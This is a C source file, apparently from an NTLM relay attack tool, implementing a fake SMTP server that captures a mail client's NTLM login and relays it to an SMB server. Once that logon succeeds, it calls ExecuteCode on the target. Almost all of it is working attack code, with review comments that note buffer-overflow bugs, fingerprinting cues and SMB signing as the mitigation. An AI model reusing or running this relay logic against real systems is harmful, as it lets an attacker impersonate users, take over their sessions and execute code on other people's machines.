00033 #include "smtprelay.h"
00034 #include "payload.h"
/* Verbosity level handed to GetNTLMPacketInfo() below; defined in another
 * translation unit (not visible in this file). */
extern int verbose;
/*
 * Drive one relayed SMTP "AUTH NTLM" exchange.
 *
 * Plays the SMTP server towards relay->source: sends a banner, answers the
 * client's EHLO with an AUTH NTLM capability, reads the client's NTLM type-1
 * blob, opens an SMB session to destinationhostname:destinationport, sends the
 * SMB server's NTLM type-2 challenge back to the SMTP client as a "334" line,
 * and finally submits the client's type-3 response to the SMB server in a
 * SessionSetupAndX request.  If the SMB server accepts it as a non-guest
 * session, ExecuteCode(*relay) is called (defined elsewhere).
 *
 * Parameters:
 *   relay               - connection pair; relay->source is the SMTP client
 *                         socket, relay->destination is the SMB server socket
 *                         (filled in by ConnectToRemoteHost()).
 *   destinationhostname - SMB host the credentials are relayed to.
 *   destinationport     - TCP port on that host.
 *
 * Returns: 0 on every path, including success, so a caller cannot tell the
 * outcomes apart by return value - only the printed log lines differ.
 *
 * NOTE(review): the packets built below (SmbPacket1, SmbPacket2, SmbPacket3)
 * are never freed on any path visible here, while NegotiateProtocol from the
 * same builder is - presumably they are heap objects too; confirm in the
 * helpers.  relay->destination is also not closed on the error returns that
 * follow ConnectToRemoteHost().
 * NOTE(review): `debug` is read throughout but not declared in this file;
 * presumably it comes from smtprelay.h - confirm.
 * NOTE(review): defender's view - the banner and EHLO reply are fixed
 * strings ("220 Microsoft ESMTP MAIL Service ready" with a bare LF, and
 * "250-server.example.com Hello [10.10.2.20]"), which makes this relay easy to
 * fingerprint in mail-traffic captures.  The relayed SMB logon only works
 * where the target does not require SMB signing, which is the standard
 * mitigation for this class of NTLM relay.
 */
int HandleIncommingSMTPRequest(RELAY *relay, char *destinationhostname, int destinationport)
{
/* Fixed-size scratch buffers; none of the writes below carry an explicit
 * bound check against them (see the per-line notes). */
char buffer[4096];
char buf[4096];
char buf1[4096];
char buf2[4096];

/* Identity fields extracted from the client's NTLM type-3 message. */
char CurrentUserName[256];
char CurrentDomain[256];
char CurrentWorkstation[256];
smheader *SmbPacket1, *SmbPacket2, *SmbPacket3, *NegotiateProtocol;
tSmbNtlmAuthRequest *request;

uint16 packetlen;
int i;
char *p;
/* SMTP banner uses a bare "\n" while every later reply uses "\r\n". */
const char WelcomeMessage[]= "220 Microsoft ESMTP MAIL Service ready\n";
const char AUTHMessage[]= "250-server.example.com Hello [10.10.2.20]\r\n250 AUTH NTLM\r\n";

/* Step 1: banner, then wait for the client's EHLO (the reply is not parsed). */
printf("[+] Sending SMTP Banner\n");
i=SendBytesAndWaitForResponse(relay->source,(char*)WelcomeMessage, (int)strlen(WelcomeMessage), buffer,sizeof(buffer),SMBWAITTIMEOUT);
if (i<=0){
printf("Error Reading EHLO message\n");
return(0);
}
/* Step 2: advertise AUTH NTLM and wait for the client's AUTH command. */
printf("[+] Answering EHLO command with an AUTH NTLM parameter\n");
memset(buffer,'\0',sizeof(buffer));
i=SendBytesAndWaitForResponse(relay->source,(char*)AUTHMessage, (int)strlen(AUTHMessage), buffer,sizeof(buffer),SMBWAITTIMEOUT);
if (i<=0){
printf("[-] Error reading client AUTH NTLM message\n");
return(0);
}
/* Only the 9-byte prefix is compared; buffer was zeroed so a short read is safe here. */
if (memcmp(buffer,"AUTH NTLM",9)!=0) {
printf("[-] AUTH NTLM packet not received from client\n");
/* Result of this send is deliberately ignored; we give up either way. */
i=SendBytesAndWaitForResponse(relay->source,(char*)"504 Unrecognized authentication type.\r\n", (int)39, buffer,sizeof(buffer),SMBWAITTIMEOUT);
return(0);
}
/* Two client behaviours: the type-1 blob inline after "AUTH NTLM " (length >
 * 12), or a bare "AUTH NTLM" that expects a 334 prompt first.
 * NOTE(review): strlen() assumes a terminator; if the helper can fill all
 * sizeof(buffer) bytes the zeroing above no longer guarantees one - confirm. */
if (strlen(buffer)>12) {
printf("[+] received AUTH NTLM message\n");

memset((char*)&buf1,'\0',sizeof(buf1));
/* Decode the base64 after "AUTH NTLM "; packetlen is unused on this branch.
 * NOTE(review): no output bound is passed to from64tobits() - confirm it
 * cannot exceed sizeof(buf1) for a long client line. */
packetlen=from64tobits(buf1, buffer+12);
request=(tSmbNtlmAuthRequest *)buf1;
dumpAuthRequest(0,request);
} else {
memset(buffer,'\0',sizeof(buffer));
i=SendBytesAndWaitForResponse(relay->source,(char*)"334 NTLM Auth allowed\r\n", (int)23, buffer,sizeof(buffer),SMBWAITTIMEOUT);
if (i<=0){
printf("[-] Error Auth response with NTLM type1 packet\n");
return(0);
}
printf("[+] received AUTH NTLM message\n");
memset((char*)&buf1,'\0',sizeof(buf1));
/* Same decode as above, without an output bound (see note on the other branch). */
packetlen=from64tobits(buf1, buffer);
request=(tSmbNtlmAuthRequest *)buf1;

if (debug) {
printf("[+] received AUTH NTLM message: %s\n",buffer);
DumpMem(buf1,packetlen);
dumpAuthRequest(0,request);
}
}



/* Step 3: open the SMB side. ConnectToRemoteHost() is expected to set
 * relay->destination; its result is only checked for zero. */
i=ConnectToRemoteHost(relay,destinationhostname,destinationport);
if (!i) {
printf("[-] Unable to connect to remote host %s:%i\n",destinationhostname,destinationport);
return(0);
}
/* Step 4: SMB Negotiate Protocol with a fixed dialect list. AddDialect()
 * grows the heap list in p and tracks its length in i (reused counter). */
printf("[+] Sending SMB Protocol Authentication Handshake\n");
p = AddDialect(NULL,"PC NETWORK PROGRAM 1.0",0x02, &i);
p = AddDialect(p,"LANMAN1.0", 0x02,&i);
p = AddDialect(p,"Windows for Workgroups 3.1a", 0x02,&i);
p = AddDialect(p,"LM1.2X002", 0x02,&i);
p = AddDialect(p,"LANMAN2.1", 0x02,&i);
p = AddDialect(p,"NT LM 0.12", 0x02,&i);
NegotiateProtocol=BuildSmbPacket(NULL,NEGOTIATEPROTOCOLREQUEST,0,p,i);
free(p);
/* The negotiate response lands in buf but is not inspected beyond "got bytes". */
i=SendBytesAndWaitForResponse(relay->destination,(char*)NegotiateProtocol,SmbPacketLen(NegotiateProtocol),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
free(NegotiateProtocol);
if (i<=0){
printf("[-] Initial SMBHandShake (LanManager Negotiation) Failed\n");
return(0);
}

/* Step 5: send the SMB SessionSetupAndX carrying NTLM type 1 and read the
 * server's reply carrying the type-2 challenge. */
SmbPacket1=BuildSmbPacket1();
if (debug) {
printf("\n[+] Dumping SMB Packet With NTLM Message Type 1\n");
DumpMem((char*)SmbPacket1,SmbPacketLen(SmbPacket1));
}

SmbPacket2=GetSmbPacket2(relay,SmbPacket1);
if (SmbPacket2==NULL) {
printf("[-] Unable to receive SMB Packet with NTLM Message Type 2\n");
return(0);
}
printf("[+] Received SMB Message with NTLM message type 2 packet\n");
/* Length of the NTLM blob, taken from the 16-bit field 4 bytes before it in
 * the server's packet (presumably the security-blob length - confirm).  It is
 * peer-controlled and is not range-checked before the copies below. */
memcpy((char*)&packetlen,GetNTLMPacketFromSmbPacket(SmbPacket2)-4,2);

if (debug) {
printf("[*] SMB Packet Dump:\n");
DumpMem((char*)SmbPacket2,SmbPacketLen(SmbPacket2));
printf("[*] NTLM Challenge packet from SMB message\n");
DumpMem((char*)GetNTLMPacketFromSmbPacket(SmbPacket2),packetlen);
dumpAuthChallenge(0,(tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2));
}

/* Step 6: relay the challenge to the SMTP client. The negotiate-flags field
 * of the challenge is overwritten with a constant before it is forwarded. */
((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2))->flags=0xb207;
memset(buf1,'\0',sizeof(buf1));
/* NOTE(review): base64 of packetlen bytes is written into buf1 (4096) and then
 * "334 " + buf1 + CRLF into buf (4096) with no bound; a large packetlen from
 * the SMB peer overruns both. */
to64frombits((unsigned char*)&buf1, (unsigned char*)GetNTLMPacketFromSmbPacket(SmbPacket2), packetlen);
sprintf(buf,"334 %s\r\n",buf1);

printf("[+] Replaying NTLM Challenge from SMB Server to the SMTP Client\n");
if (debug)
{
printf("[+] Sending SMTP Response: %s\n",buf);
}
i=SendBytesAndWaitForResponse(relay->source,(char*)buf,(int)strlen(buf),(char*)buffer,sizeof(buffer),SMBWAITTIMEOUT);
if (i<=0)
{
printf("[-] Unable to read NTLM packet 3 from smtp client\n");
return(0);
}
/* NOTE(review): writes one past the array if the helper can return
 * i == sizeof(buffer); the buffer is not zeroed before this read either. */
buffer[i]='\0';

/* Step 7: decode the client's type-3 response. */
if (debug) printf("[*] Response: %s\n",buffer);
memset((char*)&buf1,'\0',sizeof(buf1));
packetlen=from64tobits(buf1, buffer);
if (debug) {

printf("[*] Raw authorization packet (len: %i)\n",packetlen);
DumpMem(buf1,packetlen);
dumpAuthResponse(0,(tSmbNtlmAuthResponse*)buf1);
}


/* Username/domain/workstation are copied out of the client blob into the
 * 256-byte arrays; the field lengths come from the client and whether the
 * helper bounds the copies is not visible here - confirm. */
GetNTLMPacketInfo((tSmbNtlmAuthResponse*)buf1,(char*)&CurrentUserName, (char*)&CurrentDomain, (char*)&CurrentWorkstation,verbose);
printf("[+] Trying to authenticate to remote SMB as %s\n",CurrentUserName);
/* Build the type-3 message for the SMB side (into buf2) from the server's
 * challenge and the client's response, then wrap it in SessionSetupAndX. */
buildAuthResponse((tSmbNtlmAuthChallenge*)GetNTLMPacketFromSmbPacket(SmbPacket2),(tSmbNtlmAuthResponse*)buf2,0,CurrentUserName,NULL,NULL,CurrentWorkstation, (tSmbNtlmAuthResponse*)buf1);
SmbPacket3=BuildSmbPacket((smheader*)SmbPacket2,SESSIONSETUPANDX,0,buf2,(int)SmbLength((tSmbNtlmAuthResponse *)buf2));


/* Step 8: send it and read the server's verdict. */
printf("[+] Sending Final SMB Authentication packet with NTLM Message type 3\n");
if (debug)
{
DumpMem((char*)SmbPacket3, SmbPacketLen(SmbPacket3));
}

i=SendBytesAndWaitForResponse(relay->destination,(char*)SmbPacket3, SmbPacketLen(SmbPacket3),(char*)buf,sizeof(buf),SMBWAITTIMEOUT);
if (i<=0){
printf("[-] Error reading Server Authentication Response\n");
return(0);
}
if (debug) {
printf("[*] SessionSetupAndX Completed - Dumping received packet\n");
DumpMem(buf,i);
}

/* NtStatus 0 is STATUS_SUCCESS; anything else is a rejected logon.
 * NOTE(review): buf is cast to smheader without checking that i covers the
 * header and the SessionSetupAndX response fields read below. */
if (((smheader*)buf)->NtStatus!=0x00000000) {
printf("[-] SessionSetupAndX Completed\n[-] Authentication against Remote Host Failed\n");
return(0);
}
/* Bit 0 of Action marks a guest logon; treated as failure. */
if ( ((SessionSetupAndXResponse*)((smheader*)buf)->buffer)->Action & 0x0001 )
{
printf("[-] Authentication against Remote Host Failed. (Connected as Guest)\n");

return(0);
}



printf("[+] SessionSetupAndX Completed \n");
printf("[+] Authenticacion against %s Succeed with username %s\n",destinationhostname,CurrentUserName);

/* Hand the authenticated session to ExecuteCode (defined elsewhere). */
ExecuteCode( *relay);






/* Same value as every error path above. */
return(0);

}